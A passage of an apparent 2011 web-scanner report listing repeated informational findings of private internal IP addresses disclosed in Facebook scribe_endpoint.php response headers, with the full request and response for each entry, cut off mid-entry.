User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.42.35
X-Cnection: close
Date: Thu, 16 Jun 2011 14:34:45 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.410. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.73.45

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A562%2C%22baseline_elapsed%22%3A466%7D&asyncSignal=9090 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2bb31b33c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.73.45
X-Cnection: close
Date: Thu, 16 Jun 2011 13:01:43 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.411. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.196.21

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A936%2C%22baseline_elapsed%22%3A930%7D&asyncSignal=6050 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32adf5cdc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.42.196.21
X-Cnection: close
Date: Thu, 16 Jun 2011 12:10:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.412. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.240.46

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A376%2C%22baseline_elapsed%22%3A376%7D&asyncSignal=9443 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f23b6ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.240.46
X-Cnection: close
Date: Thu, 16 Jun 2011 15:10:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.413. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.128.54

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2948%2C%22baseline_elapsed%22%3A2948%7D&asyncSignal=5635 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbbabea74%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.128.54
X-Cnection: close
Date: Thu, 16 Jun 2011 18:06:50 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.414. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.99.45

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1186%2C%22baseline_elapsed%22%3A1174%7D&asyncSignal=8660 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ed102d2%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.99.45
X-Cnection: close
Date: Thu, 16 Jun 2011 14:39:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.415. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.72.52

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1485%2C%22baseline_elapsed%22%3A1485%7D&asyncSignal=8867 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31f2e355%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.72.52
X-Cnection: close
Date: Thu, 16 Jun 2011 12:20:22 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.416. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.122.47

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1649%2C%22baseline_elapsed%22%3A1649%7D&asyncSignal=8332 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.122.47
X-Cnection: close
Date: Thu, 16 Jun 2011 12:04:44 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.417. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.220.57

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A378%2C%22baseline_elapsed%22%3A370%7D&asyncSignal=1953 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfec61a178%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.220.57
X-Cnection: close
Date: Thu, 16 Jun 2011 16:38:46 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.418. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.51.51

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1309%2C%22baseline_elapsed%22%3A1309%7D&asyncSignal=6807 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe3e70054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.43.51.51
X-Cnection: close
Date: Thu, 16 Jun 2011 15:47:02 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.419. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.27.50

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1219%2C%22baseline_elapsed%22%3A1219%7D&asyncSignal=2002 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df87ebd7cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.27.50
X-Cnection: close
Date: Thu, 16 Jun 2011 12:15:14 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.420. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.67.40

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A781%2C%22baseline_elapsed%22%3A1604%7D&asyncSignal=488 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.67.40
X-Cnection: close
Date: Thu, 16 Jun 2011 13:17:14 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.421. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.182.38

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1503%2C%22baseline_elapsed%22%3A1544%7D&asyncSignal=6542 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13acfec3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.182.38
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:28 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.422. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.225.56

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A78%2C%22baseline_elapsed%22%3A296%7D&asyncSignal=4999 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df262db5da4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.225.56
X-Cnection: close
Date: Thu, 16 Jun 2011 13:43:05 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.423. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.105.77

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1529%2C%22baseline_elapsed%22%3A1545%7D&asyncSignal=1179 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.43.105.77
X-Cnection: close
Date: Thu, 16 Jun 2011 14:08:52 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.424. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.199.51

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1310%2C%22baseline_elapsed%22%3A1294%7D&asyncSignal=4292 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a6ddc32%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

